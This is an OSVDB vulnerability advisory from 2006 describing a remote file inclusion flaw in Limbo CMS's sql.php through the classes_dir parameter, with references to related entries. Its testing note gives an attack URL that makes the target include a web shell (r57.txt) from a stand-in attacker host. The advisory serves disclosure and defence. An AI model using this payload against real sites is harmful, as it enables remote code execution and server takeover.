Limbo sql.php classes_dir Variable Remote File Inclusion

2006-09-13T14:48:55
ID OSVDB:28976
Type osvdb
Reporter HACKERS PAL(security@soqor.net)
Modified 2006-09-13T14:48:55

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

/classes/adodbt/sql.php?classes_dir=http://[attacker]/tools/r57.txt?

References:

Vendor URL: http://www.limboforge.org/ Secunia Advisory ID:21944 Related OSVDB ID: 28982 Related OSVDB ID: 28983 Related OSVDB ID: 28984 Related OSVDB ID: 28987 Related OSVDB ID: 28978 Related OSVDB ID: 28979 Related OSVDB ID: 28981 Related OSVDB ID: 28977 Related OSVDB ID: 28980 Related OSVDB ID: 28986 Related OSVDB ID: 28985 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0264.html